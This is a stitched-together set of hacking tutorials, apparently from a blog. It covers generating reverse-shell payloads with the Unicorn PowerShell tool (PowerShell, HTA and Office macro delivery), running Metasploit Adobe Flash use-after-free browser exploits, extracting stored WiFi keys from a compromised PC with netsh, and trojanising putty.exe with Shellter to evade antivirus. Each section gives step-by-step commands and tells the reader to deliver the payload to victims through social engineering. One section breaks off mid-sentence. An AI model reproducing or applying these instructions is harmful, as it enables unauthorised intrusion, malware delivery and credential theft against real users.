Magic Unicorn - PowerShell Downgrade Attack and Exploitation tool

Magic Unicorn is a simple tool for using a PowerShell downgrade attack and injects shellcode straight into memory. Based on Matthew Graeber’s powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.

Table of Content

·         Powershell Attack Instruction

·         HTA Attack Instruction

·         Macro Attack Instruction

 Download the unicorn from git repository:

git clone https://github.com/trustedsec/unicorn.git

Once downloaded, go in the directory and run unicorn with the following command to see all the possible methods.

./unicorn.py

POWERSHELL ATTACK INSTRUCTIONS

First we will try the reverse_tcp payload. As we can see in the main menu all the commands are already written. We just need to replace the IP with our IP.

python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.109 4444

Now this will give us two files. One is a text file named “powershell_attack.txt” which has the powershell code that will be run in the victim’s machine using social engineering and the other is “unicorn.rc” which is a custom metasploit file that will automatically set all the parameters and start a listener.

These files will be saved in the directory where unicorn was cloned. Powershell_attack.txt holds the malicious code and when the victim will execute that code in his command prompt, the attacker will get reverse connection of his machine.

Now let’s set up a listener first. We need to run the metasploit “unicorn.rc” file using the following command:

msfconsole -r unicorn.rc

We see a session was obtained in the meterpreter. It was because the powershell code was executed in the victim’s command shell. It would have looked something like this:

HTA ATTACK INSTRUCTIONS

For our next attack, we will be using an hta payload.

python unicorn.py windows/meterpreter/reverse_https 192.168.1.109 4455 hta

Now convert your IP in bitly URL form and send to victim and then wait for the user to click on the “launcher.hta” file which could be done using social engineering easily.

So, we set up a metasploit listener next using the RC file and wait for user to click on the hta payload.

msfconsole -r unicorn.rc

As soon as he hit the file, we received a meterpreter session.

We checked the system info using sysinfo command.

MACRO ATTACK INSTRUCTIONS

Now for the third and final payload for this tutorial, we set hands on our beloved macros.

python unicorn.py windows/meterpreter/reverse_https 192.168.1.109 443 macro

This again creates a text file and an rc file with the same name and on the same destination.

To enable developed mode there are various methods depending upon your version of MS office.

As for a generic approach, let’s say you enabled it like:

File->properties->ribbons->developer mode

You will see an extra tab labeled developer once it gets enabled.

As for the attack, go to developer->macros and create a new macro named “Auto_Open”

Simply paste the contents from “powershell_attack.txt” to this xlsx module and save it.

As soon as you click run (little green icon on the top), it will give you an error! Don’t worry! You want that error. It is supposed to happen.

Soon after the error on the user screen, we would have obtained a session successfully in meterpreter!

Use sysinfo double check our successful exploitation using un

Hack Windows or Linux PC using Adobe Flash Player ByteArray Use After Free

This module exploits a use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public on its July 2015 data leak, was described as a Use After Free while handling ByteArray objects. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194, Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, and Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.

Exploit Targets

Windows 7

Adobe Flash 18.0.0.194

Firefox 38.0.5

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/browser/adobe_flash_hacking_team_uaf

msf exploit (adobe_flash_hacking_team_uaf)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_flash_hacking_team_uaf)>set lhost 192.168.0.182 (IP of Local Host)

msf exploit (adobe_flash_hacking_team_uaf)>set srvhost 192.168.0.182

msf exploit (adobe_flash_hacking_team_uaf)>set uripath /

msf exploit (adobe_flash_hacking_team_uaf)>exploit  

Now an URL you should give to your victim http://192.168.0.182:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now when the victim opens the following link (http://192.168.0.182:8080) a session will be opened as shown below

 Now type session –l to display sessions opened when the victim opens the link

Now the session has opened  type sysinfo to get system information, then type shell to enter into

Victims command prompt.

Hack Windows or Linux PC using Adobe Flash opaque Background Use After Free

This module exploits an use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public on its July 2015 data leak, was described as an Use After Free while handling the opaqueBackground property 7 setter of the flash.display.DisplayObject class. This module is an early release tested on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.203, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194, Windows 7 SP1 (32-bit), IE9 and Adobe Flash Flash 18.0.0.203, Windows 7 SP1 (32-bit), Firefox + Adobe Flash 18.0.0.194, windows 8.1, Firefox and Adobe Flash 18.0.0.203, Windows 8.1, Firefox and Adobe Flash 18.0.0.160, and Windows 8.1, Firefox and Adobe Flash 18.0.0.194

Exploit Targets

Windows 7

Adobe Flash 18.0.0.194

Firefox 38.0.5

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/browser/adobe_flash_opaque_background_uaf

msf exploit (adobe_flash_opaque_background_uaf)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_flash_opaque_background_uaf)>set lhost 192.168.0.182 (IP of Local Host)

msf exploit (adobe_flash_opaque_background_uaf)>set srvhost 192.168.0.182

msf exploit (adobe_flash_opaque_background_uaf)>set uripath /

msf exploit (adobe_flash_opaque_background_uaf)>exploit

Now an URL you should give to your victim http://192.168.0.182:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now when the victim opens the following link (http://192.168.0.182:8080) a session will be opened as shown below

Now type session –l to display sessions opened when the victim opens the link

Now the session has opened  type sysinfo to get system information, then type shell to enter into

Victims command prompt.

How to Gather WIFI Password in Remote Windows PC

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you got the meterpreter session use ‘shell ‘command to get command prompt of the target PC.

Now to see wireless Network connections in the Victim PC. Use Netsh Command.

Netsh is a command line utility included in Windows operating system which allows local and remote configuration of the network devices such as interface.

netsh wlan show profile

This command will show all profiles on interface wireless network connections accessed by Victim PC.

Now we have got the network interface profiles. To retrieve stored    Security key of specific Network interface profile. Again use Netsh command with specified Profile Name. Such As

Netsh wlan show profile =tiny key =clear

Above command will show the security key as option Key content.

It will also show the Network type, SSID name as well as Authentication present in that Security Key.

Bypass Antivirus and Hack Remote Windows PC with shelter

Hey Folks! Welcome back to learning more of what you love to do. That is, evading security of other computer or network. You know that there are various tools to assist you in this. One of such tools is Shellter.

Shellter is an active shellcode insertion tool. It effectively re-encodes payloads (here shellcode) to bypass anti-virus (AV) software. Shellter has proved to be the first dynamic infector for PE (Portable Executable) file format of Windows 32-bit applications.

To use Shellter, you can either create your own shellcode or create one from a framework such as Metasploit. Shellter embeds a 32-bit Windows application and the shellcode in such as way that it goes undetected by the AV software.

Let’s now discuss the steps to evade an AV software using Shellter in Kali Linux.

Download and Install Shellter

Download Shellter from here. You can download Shellter in Windows and then run it on Kali Linux using Wine. It runs Windows applications on Linux like operating systems. In this way, you can reduce the time required for installation.

You can install Shellter directly on Kali by using the following command:

apt –get install shellter

You can install Wine on Kali with the following command:

apt –get install wine32

Open Shellter

When you open Shellter in Kali in wine mode, it prompts you to choose operation mode.

Choose Operation Mode

Select the mode as ‘a’. It stands for auto. 

Now, you need to choose an executable file and copy it to the Shellter folder. This is required to be done to bind Shellter with an .exe file. In our case, we have copied putty.exe file to the Shellter folder and bound it with shellter.exe file.

When asked for PE Target, type the following command:

/root/Downloads/putty.exe

 

The binding process starts.

Press the Enter key to continue. You may see DisASM.dll file gets successfully created. Enable Stealth Mode. Then, you are prompted to enable stealth mode.

Type ‘y’ for yes.

Select Payload

The screen shows a list of payloads. It asks you whether you want to use a listed payload or custom.

Type ‘L’ to use from listed payload.

Then, it asks you to select payload by index. You can select payload of your choice. In our case, we have selected 1 for Meterpreter_Reverse_TCP

Then you are asked to set LHOST and LPORT. Type the local host IP and the local port on which you want the session. In our case, we have set LHOST 192.168.1.109 [Attacker IP] LPORT as 4444.

When you press the Enter key, the payload information is displayed.

A warning message appears and as soon as the injection is verified, you are asked to press the Enter key to continue. When you press the Enter key.

Run Exploit

In a new terminal type msfconsole to launch metasploit framework and execute following command

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost

set lport

exploit

Send PuTTY.exe File to Victim’s Machine

When the victim’s click the putty.exe file which will be appear as similar as original putty.exe and hence the victim’s will get trapped and we will get meterpreter session.

 

As soon as the victim’s will click on putty.exe file, we will get meterpreter session as shown in the below image.

The meterpreter session opens and there you are ready to peek into the target system.